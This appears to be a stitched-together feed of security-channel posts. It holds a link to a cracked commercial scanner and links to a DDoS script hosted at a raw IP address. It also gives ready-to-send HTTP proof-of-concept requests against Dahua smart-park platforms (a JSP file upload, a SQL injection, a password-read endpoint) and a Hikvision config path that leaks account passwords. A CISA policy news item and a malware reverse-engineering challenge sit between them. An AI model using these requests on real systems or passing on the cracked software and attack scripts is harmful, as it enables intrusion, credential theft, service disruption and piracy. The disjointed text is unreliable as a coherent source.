THOR APT Scanner 10.7.9 Windows
THOR accelerates your forensic analysis with over 17,000 hand-crafted YARA signatures, 400 Sigma rules, numerous anomaly detection rules, and thousands of IOCs.
THOR is the perfect tool to highlight suspicious elements, reduce workload and speed up forensic analysis at the moments when fast results are crucial.
THOR APT Scanner 10.7.9 Windows
Download: https://ponies.cloud/av_endpoint_ids/Nextron/Nextron_Thor_10.7.9.0_Windows_Cracked_Pwn3rzs.7z
Password: 20230928_0008

Script for DDoS attacks by EagleCyberCrewhXXp://47.88.79.56/ECC-DDoS/
hXXp://47.88.79.56/succubus/

The Cybersecurity and Infrastructure Security Agency (CISA) is working with industry stakeholders and government agencies to develop a new version of the National Cyber ​​Incident Response Plan (NCIRP), a framework that outlines the nation’s response to major cyber incidents. The updated plan was authorized in the 2023 National Cybersecurity Strategy, and CISA is currently working with the Office of the National Cyber ​​Director (ONCD) to coordinate input from regulators, critical infrastructure organizations and others. Eric Goldstein, CISA's executive assistant director for cybersecurity, said in a statement Friday that a new version of the plan is needed since it was first released seven years ago. "Our approach to updating NCIRP will be grounded in transparency and collaboration, recognizing that the private sector is often the first responder to many cyber incidents and that adversaries increasingly operate beyond national borders," he said. "Our goal is to... Providing an agile, actionable framework that every organization involved in cyber incident response can proactively use to ensure coordination and match the pace of our adversaries." Goldstein added that the new initiative aims to “Respond to and recover from cyber incidents more effectively in a manner that reduces harm to every possible victim.” Neither CISA nor ONCD existed when the plan was first released, and the agencies noted that the cybersecurity landscape has changed dramatically , various private sector organizations use more sophisticated incident response plans in response to threat landscapes that now include devastating ransomware attacks. Christopher DeRusha, federal chief information security officer and deputy director for national cyber, explained that the program is critical to the government's efforts to become more "collaborative, agile and responsive to the evolving threat landscape." CISA began meeting with stakeholders in September and will continue holding hearings in November. In December, they will begin writing the document, which will then be open to the public for comment. According to a fact sheet shared by the agency, they expect the updated plan to be approved and released by the end of 2024. CISA faced strong bipartisan backlash in September for refusing to develop a specific Continuity of the Economic (COTE) plan in response to a major cyberattack. The plan, included in the National Defense Authorization Act for Fiscal Year 2021, will outline steps the federal government will take in the event of a cyberattack that severely harms the U.S. economy. Congress ordered the White House to develop the plan in 2021, and a response finally came in August. The 29-page CISA report concluded that there is no need for a new COTE program, given that multiple programs are already in place to help the country respond to and recover from cyberattacks that could cause significant damage to the U.S. economy. Some industry stakeholders are warning the federal government that detailed coordinated plans are needed in the event of a large-scale cyberattack affecting key parts of the U.S. economy or government.

CVE-2023-34051VMware Aria Operations for Logs
*
Technical Deep
*
[Exploit

#vmware](https://github.com/horizon3ai/CVE-2023-34051) #bypass #exploit

Horizon3.ai

VMware Aria Operations for Logs CVE-2023-34051 Technical Deep Dive and IOCs

Technical deep-dive, indicators of compromise, and exploit POC for CVE-2023-34051 which affects VMware vRealize Log Insight RCE as reported in VMSA-2023-0021. This vulnerability leads to remote code execution and full system compromise.

[0day] Hikvision integrated security management platform information leakage (intranet centralized account password) vulnerability
poc:
/portal/conf/config.properties

HIKVISION iSecure Center comprehensive security management platform is an "integrated" and "intelligent" platform. By accessing equipment such as video surveillance, all-in-one card, parking lot, alarm detection and other systems, Hikvision comprehensive security management platform information exists Information leakage (internal network centralized account password) vulnerability can be decrypted through decryption software, username and password.

We have a reverse engineering challenge for you nerds.

In Black Mass Vol. 3, scheduled for October, 2024, we will unveil "Matryoshka". Matryoshka is a strange malware proof-of-concept. We would like you to reverse engineer it to tell us how you think it works.

• Matryoshka only works on Windows 10 or above
• proof-of-concept is not malicious
• you're free to reverse engineer it by any means necessary: static, dynamic, sandbox, making your friend do it, whatever.
• malware proof-of-concept is NOT packed
• Matryoshka does not possess any anti-debug or anti-VM functionality
• source code and full explanation of code will be released in Black Mass Vol. 3
• best write up goes in Black Mass Vol. 3 to show the defensive aspect to Matryoshka!
• binary is being shared in .7z with a super 1337 password!!!!11

inb4 someone reverse engineers it in totality in 2 minutes because they've seen "Kob*".

Matryoshka download: https://samples.vx-underground.org/root/Samples/Matryoshka.7z

VulName：大华智慧园区综合管理平台 文件上传漏洞
FOFA：未知
POC(点击复制)：

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User\-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content\-Length: 804
Content\-Type: multipart/form\-data; boundary=dd8f988919484abab3816881c55272a7
Accept\-Encoding: gzip, deflate
Connection: close

\-\-dd8f988919484abab3816881c55272a7
Content\-Disposition: form\-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
\-\-dd8f988919484abab3816881c55272a7
Content\-Disposition: form\-data; name="poc"

poc
\-\-dd8f988919484abab3816881c55272a7
Content\-Disposition: form\-data; name="Submit"

submit
\-\-dd8f988919484abab3816881c55272a7\-\-

影响：大华智慧园区综合管理平台

#漏洞 #POC发布 #大华智慧园区

VulName：大华智慧园区综合管理平台 searchJson SQL注入漏洞
FOFA：未知
POC(点击复制)：

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)\-\-%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User\-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept\-Encoding: gzip, deflate
Connection: close

影响：大华智慧园区综合管理平台

#漏洞 #POC发布 #大华智慧园区

VulName：大华智慧园区任意密码读取攻击
FOFA：未知
POC(点击复制)：

GET /admin/user_getUserInfoByUserName.action?userName=system影响：大华智慧园区

#漏洞 #POC发布 #大华智慧园区

PHPJabbers Shuttle Booking Software 1.0 Cross Site Scripting

⬇️ 点击下方链接快速阅读 ⬇️